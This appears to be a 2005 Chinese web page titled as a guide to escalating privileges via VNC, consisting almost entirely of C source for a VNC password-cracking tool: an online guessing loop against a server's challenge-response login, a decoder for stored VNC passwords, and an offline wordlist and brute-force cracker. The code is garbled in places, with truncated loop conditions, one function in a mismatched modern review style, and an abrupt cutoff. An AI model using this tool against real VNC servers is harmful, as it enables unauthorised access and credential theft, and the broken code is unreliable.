
如何利用VNC服务提升权限

作者:未知  来源:supcode.com收集整理  发布时间:2005-7-1 14:59:29
>1) {
printf("Authentication type: ");
for (i=0;i<4;i++) { printf("%x ",atype[i]); }
printf("\n");
}

switch (atype[3]) {
case 0:
fprintf(stderr,"Server told me: connection close\n");
if (verbose) {
// try to retrieve the reason
memset(servertext,0,sizeof(servertext));
if (recv(sfd,servertext,sizeof(servertext),0)<0) {
fprintf(stderr,"recv() in verbose");
exit(-1);
} else {
sthelp=servertext;
sthelp+=4;
fprintf(stderr,"Server says: %s\n",sthelp);
}
if (verbose) printf("\tWaiting for blocking disable\n");
Sleep(redosleep*1000);
if ((redocount++)<3) {
goto ReDoClosed;
} else {
fprintf(stderr,"\tgiving up (increase -R)\n");
}
}
exit(-1);
break; /* not reached */
case 1:
printf( "\n>>>>>>>>>>>>>>>\n"
"Server does not require authentication!\n"
">>>>>>>>>>>>>>>\n");
exit(-1);
break; /* not reached */
case 2:
if (verbose>1)
printf( "Authentication type 'VNC authentication' - fine\n");
break;
default:
fprintf(stderr,"Unknown authentication requested by server\n");
exit(-1);
}
redocount=0;

if (recv(sfd,challange,sizeof(challange),0)<0) {
fprintf(stderr,"recv()");
exit(-1);
}

if (verbose>1) {
printf("challange: ");
for (i=0;i<16;i++) { printf("%x ",challange[i]); }
printf("\n");
}

/* encrypt challange with password and send this fuck to the server */
vncEncryptBytes(challange,tryword);

if (send(sfd,challange,sizeof(challange),0)<0) {
fprintf(stderr,"auth send()");
exit(-1);
}

atype[3]=0;
if (recv(sfd,atype,sizeof(atype),0)<0) {
fprintf(stderr,"auth recv()");
exit(-1);
}
switch (atype[3]) {
case 0:
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",tryword);
free(tryword);
exit(0);
break; /* not reached */

case 1: /* 'normal' failed */
if (verbose) printf("failed\n");
break;
case 2: /* too many */
printf("Server is angry, waiting for calm down...\n");
sleep(10000);
break;
default:
fprintf(stderr,"Unknown response\n");
exit(-1);
}

shutdown(sfd,2);

closesocket(sfd);
memset(tryword,0,256);
}

free(tryword);
fclose(fd);

return 0;
}

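/*
 * interactive - read a stored 8-byte VNC password as hex and print it decoded.
 *
 * Reads eight hexadecimal byte values from stdin, echoes them back, loads
 * `fixedkey` into the DES key schedule with mode DE1, runs des() over the
 * buffer in place and prints the result as a string.
 *
 * Never returns: exits with 0 after printing, or with -1 on allocation
 * failure or malformed input.
 *
 * NOTE(review): `fixedkey` is defined outside this block. If it is the
 * program-wide constant its name suggests, the stored value is only
 * obfuscated, not protected: anyone who can read it can recover the
 * password, so the stored value needs the same access control as the
 * plaintext password.
 */
void interactive(void) {
    unsigned char *pass;
    unsigned int byte;
    int i;

    /* 8 data bytes plus one slot for the terminator needed by "%s" below. */
    pass = (unsigned char *)sec_malloc(9);
    if (pass == NULL) {
        /* sec_malloc's failure behaviour is not visible here; check anyway. */
        fprintf(stderr, "sec_malloc()");
        exit(-1);
    }

    for (i = 0; i < 8; i++) {
        /*
         * "%x" stores an unsigned int. The original passed the address of a
         * char, so every read wrote past that object; read into a properly
         * sized variable and narrow explicitly.
         */
        if (scanf("%x", &byte) != 1) {
            fprintf(stderr, "Expected 8 hex bytes\n");
            exit(-1);
        }
        pass[i] = (unsigned char)byte;
    }

    printf("Entered HEX String: ");
    for (i = 0; i < 8; i++) {
        printf("%x ", pass[i]);
    }
    printf("\n");

    deskey(fixedkey, DE1);
    des(pass, pass);

    /* des() works on the 8 data bytes only; terminate before printing. */
    pass[8] = '\0';
    printf("VNC Password: %s\n", (char *)pass);

    exit(0);
}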

void cr_crack(char *wordlist) {
int i,j;
#define CRL 16
char chl[CRL+1];
char rsp[CRL+1];
char tchl[CRL+1];
char ts[3];
FILE *fd;
char *tryword;

char bft[9];
char cset1[] =
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0";
#define cset1_len (92)
int cnt[8];

time_t t1,t2;

if (!wordlist) {
fprintf(stderr,"Supply wordlist file !");
exit(-1);
}


if ((!schallange)||(!sresponse)) {
usage();
}
if (
(strlen(schallange)!=16*2)
||(strlen(sresponse)!=16*2)
) {
fprintf(stderr,
"challange and response have to be 32 characters each\n");
exit (-1);
}

memset(&chl,0,CRL+1);
memset(&tchl,0,CRL+1);
memset(&rsp,0,CRL+1);
memset(&ts,0,3);

j=0;
for (i=0;i strncpy(ts,&schallange[j],2);
chl[i]=(unsigned char)strtol(ts,NULL,16);
strncpy(ts,&sresponse[j],2);
rsp[i]=(unsigned char)strtol(ts,NULL,16);
j+=2;
}
if (verbose) {
printf("Challange: ");
for (i=0;i printf("%x",(unsigned char) chl[i]);
}
printf("\n");
printf("Response : ");
for (i=0;i printf("%x",(unsigned char) rsp[i]);
}
printf("\n");
}

if ((fd=fopen(wordlist,"rt"))==NULL) {
fprintf(stderr,"Could not open wordlist\n");
exit (-1);
}

tryword=sec_malloc(256);
while (fgets(tryword,255,fd)!=NULL) {
tryword[strlen(tryword)-1]='\0';
/* try this word */
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,tryword);

if (verbose>1) {
for (i=0;i printf("%x",(unsigned char) rsp[i]);
}
printf("\n");
for (i=0;i printf("%x",(unsigned char) tchl[i]);
}
printf("\n");
}

if (!memcmp(tchl,rsp,CRL)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",tryword);
free(tryword);
exit(0);
} else {
if (verbose) printf("%s failed\n",tryword);
}
memset(tryword,0,256);
}
fclose(fd);
free(tryword);

printf( "-----------------------------------\n"
"Wordlist failed - going brute force\n"
"-----------------------------------\n" );

t1=GetTickCount();

bft[8]='\0';

bft[1]='\0';
printf("\tdepth I\n");
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)
printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0

bft[2]='\0';
printf("\tdepth II\n");
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)
printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} // for 1

/************/
bft[3]='\0';
printf("\tdepth III\n");
for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)
printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} // for 1
} file://2

/************/
bft[4]='\0';
printf("\tdepth IV\n");
for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)
printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} /
